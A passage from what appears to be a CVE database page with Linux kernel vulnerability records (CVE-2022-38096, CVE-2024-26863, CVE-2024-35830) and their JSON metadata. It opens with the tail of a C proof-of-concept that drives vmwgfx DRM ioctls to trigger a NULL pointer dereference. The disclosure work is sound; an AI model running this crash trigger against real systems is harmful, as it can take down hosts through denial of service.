-1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-476",
              "description": "CWE-476 NULL Pointer Dereference",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-25T21:08:05.642043",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        },
        {
          "name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2073"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is a NULL pointer vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-38096",
    "datePublished": "2022-09-09T14:39:51.163117Z",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-09-16T19:46:43.355Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26863 (GCVE-0-2024-26863)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:27 – Updated: 2025-05-04 08:58

Title

hsr: Fix uninit-value access in hsr_get_node()

Summary

In the Linux kernel, the following vulnerability has been resolved: hsr: Fix uninit-value access in hsr_get_node() KMSAN reported the following uninit-value access issue [1]: ===================================================== BUG: KMSAN: uninit-value in hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246 hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246 fill_frame_info net/hsr/hsr_forward.c:577 [inline] hsr_forward_skb+0xe12/0x30e0 net/hsr/hsr_forward.c:615 hsr_dev_xmit+0x1a1/0x270 net/hsr/hsr_device.c:223 __netdev_start_xmit include/linux/netdevice.h:4940 [inline] netdev_start_xmit include/linux/netdevice.h:4954 [inline] xmit_one net/core/dev.c:3548 [inline] dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564 __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349 dev_queue_xmit include/linux/netdevice.h:3134 [inline] packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276 packet_snd net/packet/af_packet.c:3087 [inline] packet_sendmsg+0x8b1d/0x9f30 net/packet/af_packet.c:3119 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] __sys_sendto+0x735/0xa10 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Uninit was created at: slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768 slab_alloc_node mm/slub.c:3478 [inline] kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560 __alloc_skb+0x318/0x740 net/core/skbuff.c:651 alloc_skb include/linux/skbuff.h:1286 [inline] alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334 sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787 packet_alloc_skb net/packet/af_packet.c:2936 [inline] packet_snd net/packet/af_packet.c:3030 [inline] packet_sendmsg+0x70e8/0x9f30 net/packet/af_packet.c:3119 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] __sys_sendto+0x735/0xa10 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b CPU: 1 PID: 5033 Comm: syz-executor334 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023 ===================================================== If the packet type ID field in the Ethernet header is either ETH_P_PRP or ETH_P_HSR, but it is not followed by an HSR tag, hsr_get_skb_sequence_nr() reads an invalid value as a sequence number. This causes the above issue. This patch fixes the issue by returning NULL if the Ethernet header is not followed by an HSR tag.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e3b2bfb8ff1810a53…
	https://git.kernel.org/stable/c/889ed056eae7fda85…
	https://git.kernel.org/stable/c/7fb2d4d6bb1c85f7a…
	https://git.kernel.org/stable/c/a809bbfd0e503351d…
	https://git.kernel.org/stable/c/1ed222ca7396938eb…
	https://git.kernel.org/stable/c/39cc316fb3bc5e7c9…
	https://git.kernel.org/stable/c/97d2148ea435dff4b…
	https://git.kernel.org/stable/c/09e5cdbe2cc88c3c7…
	https://git.kernel.org/stable/c/ddbec99f585713016…

Impacted products

Vendor

Product

Version

Linux

Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < e3b2bfb8ff1810a537b2aa55ba906a6743ed120c (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 889ed056eae7fda85b769a9ab33c093379c45428 (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 7fb2d4d6bb1c85f7a23aace0ed6c86a95dea792a (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < a809bbfd0e503351d3051317288a70a4569a4949 (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 1ed222ca7396938eb1ab2d034f1ba0d8b00a7122 (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 39cc316fb3bc5e7c9dc5eed314fe510d119c6862 (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 97d2148ea435dff4b4e71817c9032eb321bcd37e (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < 09e5cdbe2cc88c3c758927644a3eb02fac317209 (git)
Affected: f266a683a4804dc499efc6c2206ef68efed029d0 , < ddbec99f58571301679addbc022256970ca3eac6 (git)

Linux

Affected: 3.17
Unaffected: 0 , < 3.17 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26863",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-10T14:26:51.386344Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:38.902Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:04.149Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e3b2bfb8ff1810a537b2aa55ba906a6743ed120c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/889ed056eae7fda85b769a9ab33c093379c45428"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7fb2d4d6bb1c85f7a23aace0ed6c86a95dea792a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a809bbfd0e503351d3051317288a70a4569a4949"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1ed222ca7396938eb1ab2d034f1ba0d8b00a7122"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39cc316fb3bc5e7c9dc5eed314fe510d119c6862"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/97d2148ea435dff4b4e71817c9032eb321bcd37e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09e5cdbe2cc88c3c758927644a3eb02fac317209"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ddbec99f58571301679addbc022256970ca3eac6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/hsr/hsr_framereg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e3b2bfb8ff1810a537b2aa55ba906a6743ed120c",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "889ed056eae7fda85b769a9ab33c093379c45428",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "7fb2d4d6bb1c85f7a23aace0ed6c86a95dea792a",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "a809bbfd0e503351d3051317288a70a4569a4949",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "1ed222ca7396938eb1ab2d034f1ba0d8b00a7122",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "39cc316fb3bc5e7c9dc5eed314fe510d119c6862",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "97d2148ea435dff4b4e71817c9032eb321bcd37e",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "09e5cdbe2cc88c3c758927644a3eb02fac317209",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            },
            {
              "lessThan": "ddbec99f58571301679addbc022256970ca3eac6",
              "status": "affected",
              "version": "f266a683a4804dc499efc6c2206ef68efed029d0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/hsr/hsr_framereg.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.17"
            },
            {
              "lessThan": "3.17",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.311",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.273",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.214",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.153",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.83",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.23",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.11",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.2",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.17",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhsr: Fix uninit-value access in hsr_get_node()\n\nKMSAN reported the following uninit-value access issue [1]:\n\n=====================================================\nBUG: KMSAN: uninit-value in hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246\n hsr_get_node+0xa2e/0xa40 net/hsr/hsr_framereg.c:246\n fill_frame_info net/hsr/hsr_forward.c:577 [inline]\n hsr_forward_skb+0xe12/0x30e0 net/hsr/hsr_forward.c:615\n hsr_dev_xmit+0x1a1/0x270 net/hsr/hsr_device.c:223\n __netdev_start_xmit include/linux/netdevice.h:4940 [inline]\n netdev_start_xmit include/linux/netdevice.h:4954 [inline]\n xmit_one net/core/dev.c:3548 [inline]\n dev_hard_start_xmit+0x247/0xa10 net/core/dev.c:3564\n __dev_queue_xmit+0x33b8/0x5130 net/core/dev.c:4349\n dev_queue_xmit include/linux/netdevice.h:3134 [inline]\n packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276\n packet_snd net/packet/af_packet.c:3087 [inline]\n packet_sendmsg+0x8b1d/0x9f30 net/packet/af_packet.c:3119\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nUninit was created at:\n slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768\n slab_alloc_node mm/slub.c:3478 [inline]\n kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560\n __alloc_skb+0x318/0x740 net/core/skbuff.c:651\n alloc_skb include/linux/skbuff.h:1286 [inline]\n alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334\n sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787\n packet_alloc_skb net/packet/af_packet.c:2936 [inline]\n packet_snd net/packet/af_packet.c:3030 [inline]\n packet_sendmsg+0x70e8/0x9f30 net/packet/af_packet.c:3119\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg net/socket.c:745 [inline]\n __sys_sendto+0x735/0xa10 net/socket.c:2191\n __do_sys_sendto net/socket.c:2203 [inline]\n __se_sys_sendto net/socket.c:2199 [inline]\n __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nCPU: 1 PID: 5033 Comm: syz-executor334 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023\n=====================================================\n\nIf the packet type ID field in the Ethernet header is either ETH_P_PRP or\nETH_P_HSR, but it is not followed by an HSR tag, hsr_get_skb_sequence_nr()\nreads an invalid value as a sequence number. This causes the above issue.\n\nThis patch fixes the issue by returning NULL if the Ethernet header is not\nfollowed by an HSR tag."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:58:14.505Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e3b2bfb8ff1810a537b2aa55ba906a6743ed120c"
        },
        {
          "url": "https://git.kernel.org/stable/c/889ed056eae7fda85b769a9ab33c093379c45428"
        },
        {
          "url": "https://git.kernel.org/stable/c/7fb2d4d6bb1c85f7a23aace0ed6c86a95dea792a"
        },
        {
          "url": "https://git.kernel.org/stable/c/a809bbfd0e503351d3051317288a70a4569a4949"
        },
        {
          "url": "https://git.kernel.org/stable/c/1ed222ca7396938eb1ab2d034f1ba0d8b00a7122"
        },
        {
          "url": "https://git.kernel.org/stable/c/39cc316fb3bc5e7c9dc5eed314fe510d119c6862"
        },
        {
          "url": "https://git.kernel.org/stable/c/97d2148ea435dff4b4e71817c9032eb321bcd37e"
        },
        {
          "url": "https://git.kernel.org/stable/c/09e5cdbe2cc88c3c758927644a3eb02fac317209"
        },
        {
          "url": "https://git.kernel.org/stable/c/ddbec99f58571301679addbc022256970ca3eac6"
        }
      ],
      "title": "hsr: Fix uninit-value access in hsr_get_node()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26863",
    "datePublished": "2024-04-17T10:27:26.252Z",
    "dateReserved": "2024-02-19T14:20:24.184Z",
    "dateUpdated": "2025-05-04T08:58:14.505Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35830 (GCVE-0-2024-35830)

Vulnerability from cvelistv5 – Published: 2024-05-17 13:41 – Updated: 2025-05-04 09:06

Title

media: tc358743: register v4l2 async device only after successful setup

Summary

In the Linux kernel, the following vulnerability has been resolved: media: tc358743: register v4l2 async device only after successful setup Ensure the device has been setup correctly before registering the v4l2 async device, thus allowing userspace to access.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/17c2650de14842c25…
	https://git.kernel.org/stable/c/daf21394f9898fb9f…
	https://git.kernel.org/stable/c/610f20e5cf35ca9c0…
	https://git.kernel.org/stable/c/b8505a1aee8f1edc9…
	https://git.kernel.org/stable/c/8ba8db9786b55047d…
	https://git.kernel.org/stable/c/edbb3226c985469a2…
	https://git.kernel.org/stable/c/c915c46a25c3efb08…
	https://git.kernel.org/stable/c/4f1490a5d7a0472ee…
	https://git.kernel.org/stable/c/87399f1ff92203d65…

Impacted products

Vendor

Product

Version

Linux

Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < 17c2650de14842c25c569cbb2126c421489a3a24 (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < daf21394f9898fb9f0698c3e50de08132d2164e6 (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < 610f20e5cf35ca9c0992693cae0dd8643ce932e7 (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < b8505a1aee8f1edc9d16d72ae09c93de086e2a1a (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < 8ba8db9786b55047df5ad3db3e01dd886687a77d (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < edbb3226c985469a2f8eb69885055c9f5550f468 (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < c915c46a25c3efb084c4f5e69a053d7f7a635496 (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < 4f1490a5d7a0472ee5d9f36547bc4ba46be755c7 (git)
Affected: 4c5211a100399c3823563193dd881dcb3b7d24fc , < 87399f1ff92203d65f1febf5919429f4bb613a02 (git)

Linux

Affected: 4.3
Unaffected: 0 , < 4.3 (semver)
Unaffected: 4.19.311 , ≤ 4.19.* (semver)
Unaffected: 5.4.273 , ≤ 5.4.* (semver)
Unaffected: 5.10.214 , ≤ 5.10.* (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.478Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17c2650de14842c25c569cbb2126c421489a3a24"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/daf21394f9898fb9f0698c3e50de08132d2164e6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/610f20e5cf35ca9c0992693cae0dd8643ce932e7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b8505a1aee8f1edc9d16d72ae09c93de086e2a1a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8ba8db9786b55047df5ad3db3e01dd886687a77d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/edbb3226c985469a2f8eb69885055c9f5550f468"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c915c46a25c3efb084c4f5e69a053d7f7a635496"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f1490a5d7a0472ee5d9f36547bc4ba46be755c7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/87399f1ff92203d65f1febf5919429f4bb613a02"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35830",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:42:22.059592Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:20.797Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/i2c/tc358743.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "17c2650de14842c25c569cbb2126c421489a3a24",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "daf21394f9898fb9f0698c3e50de08132d2164e6",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "610f20e5cf35ca9c0992693cae0dd8643ce932e7",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "b8505a1aee8f1edc9d16d72ae09c93de086e2a1a",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "8ba8db9786b55047df5ad3db3e01dd886687a77d",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "edbb3226c985469a2f8eb69885055c9f5550f468",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "c915c46a25c3efb084c4f5e69a053d7f7a635496",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "4f1490a5d7a0472ee5d9f36547bc4ba46be755c7",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            },
            {
              "lessThan": "87399f1ff92203d65f1febf5919429f4bb613a02",
              "status": "affected",
              "version": "4c5211a100399c3823563193dd881dcb3b7d24fc",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/i2c/tc358743.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.3"
            },
            {
              "lessThan": "4.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.311",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.273",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.214",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.83",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.23",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
